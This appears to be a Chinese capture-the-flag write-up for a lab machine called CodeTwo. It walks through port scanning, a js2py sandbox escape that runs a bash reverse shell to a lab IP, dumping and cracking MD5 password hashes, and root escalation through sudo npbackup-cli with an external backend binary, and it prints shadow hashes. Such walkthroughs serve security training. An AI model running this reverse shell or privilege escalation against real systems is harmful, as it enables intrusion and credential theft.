基本信息

端口扫描

22和8000:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV -Pn 10.10.11.82
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-22 13:40 JST
Nmap scan report for 10.10.11.82
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 a0:47:b4:0c:69:67:93:3a:f9:b4:5d:b3:2f:bc:9e:23 (RSA)
|   256 7d:44:3f:f1:b1:e2:bb:3d:91:d5:da:58:0f:51:e5:ad (ECDSA)
|_  256 f1:6b:1d:36:18:06:7a:05:3f:07:57:e1:ef:86:b4:85 (ED25519)
8000/tcp open  http    Gunicorn 20.0.4
|_http-server-header: gunicorn/20.0.4
|_http-title: Welcome to CodeTwo
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.38 seconds

8000

开源项目介绍页面:

Code Editor

随意注册登录,是在线的JavaScript code runner:

app

回到首页下载app查看代码,可以发现使用js2py运行javascript,requirements里可以知道js2py==0.74:

js2py to shell

搜索可以找到相关漏洞:

修改poc中cmd获取到app shell:

1
let cmd = "bash -c '/bin/bash -i >& /dev/tcp/10.10.14.6/4444 0>&1'"

database

常规翻数据库,得到hash:

1
2
3
4
5
6
7
8
9
app@codetwo:~/app/instance$ sqlite3 users.db

sqlite> .tables
.tables
code_snippet  user
sqlite> select * from user;
select * from user;
1|marco|649c9d65a206a75f5abe509fe128bce5
2|app|a97588c0e2fa3a024876339e27aeb42e

破解出marco密码:

1
2
3
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=Raw-Md5

sweetangelbabylove

user flag

marco用户ssh登录:

提权信息

很明显是利用backup,marco在backups组,并且可以sudo运行npbackup-cli,查看选项发现–external-backend-binary可以执行外部文件:

提权 & root flag

所以就是准备一个文件写入命令,通过–external-backend-binary执行命令

1
sudo /usr/local/bin/npbackup-cli -c /home/marco/npbackup.conf --external-backend-binary=/tmp/miao/miao.sh --backup

shadow

1
2
3
root:$6$UM1RuabUYlt5BQ5q$ZtzAfYOaCaFxA8MGbyH1hegFpzQmJrpIkx7vEIKvXoVl830AXAx1Hgh8r11GlpXgY25LK8wF76nvQYQ1wLSn71:20104:0:99999:7:::
marco:$6$i5xRI7UVqeBITIby$NQKHXVvAWz7Vl3QkEwgxw0ItF9Lwen4gGCBi.YYiDQTdkgcPABaqfmBzheAM/9JA/9J7szqDzPaIDbkNqc.0V.:20022:0:99999:7:::
app:$6$5iH3Zik78QR8t9Se$bgRAig/YjbMzwOTFME629sLrrTn2avVD9pLFwz0X2zBTz0LYfNIEuw6w5s53NNu2K7IeEJK4D6j9PB6SR.UvC0:20022:0:99999:7:::

参考资料